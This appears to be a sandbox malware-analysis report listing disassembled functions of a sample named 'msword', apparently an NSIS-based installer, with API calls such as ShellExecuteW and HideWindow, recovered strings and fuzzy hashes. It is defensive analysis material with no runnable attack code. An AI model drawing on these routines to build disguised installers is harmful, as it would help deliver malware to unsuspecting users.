Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: ... %d%%$P1B$X1C$X1C
API String ID: 651206458-1535804072
Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GlobalFree.KERNELBASE(005FFA20), ref: 00402387

Strings

Exch: stack < %d elements, xrefs: 00401ED8
TargetedRejectAccomplishComicsEngagementRendered, xrefs: 00401EFB, 00401F00, 00401F1A
Pop: stack empty, xrefs: 00401F2C

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: FreeGloballstrcpyn
String ID: Exch: stack < %d elements$Pop: stack empty$TargetedRejectAccomplishComicsEngagementRendered
API String ID: 1459762280-187782834
Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E

GlobalFree.KERNELBASE(005FFA20), ref: 00402387

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
<RM>, xrefs: 00402713
TargetedRejectAccomplishComicsEngagementRendered, xrefs: 00402770

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: <RM>$TargetedRejectAccomplishComicsEngagementRendered$WriteINIStr: wrote [%s] %s=%s in %s
API String ID: 247603264-3745045155
Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139

Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405E9D
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8

Strings

nsa, xrefs: 00405E8C

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D

Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85

Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89

Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86

Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85

Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86

Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86

Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNELBASE(?), ref: 004073C5
GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
GlobalFree.KERNELBASE(?), ref: 0040743D
GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: Global$AllocFree
String ID:
API String ID: 3394109436-0
Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E

Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
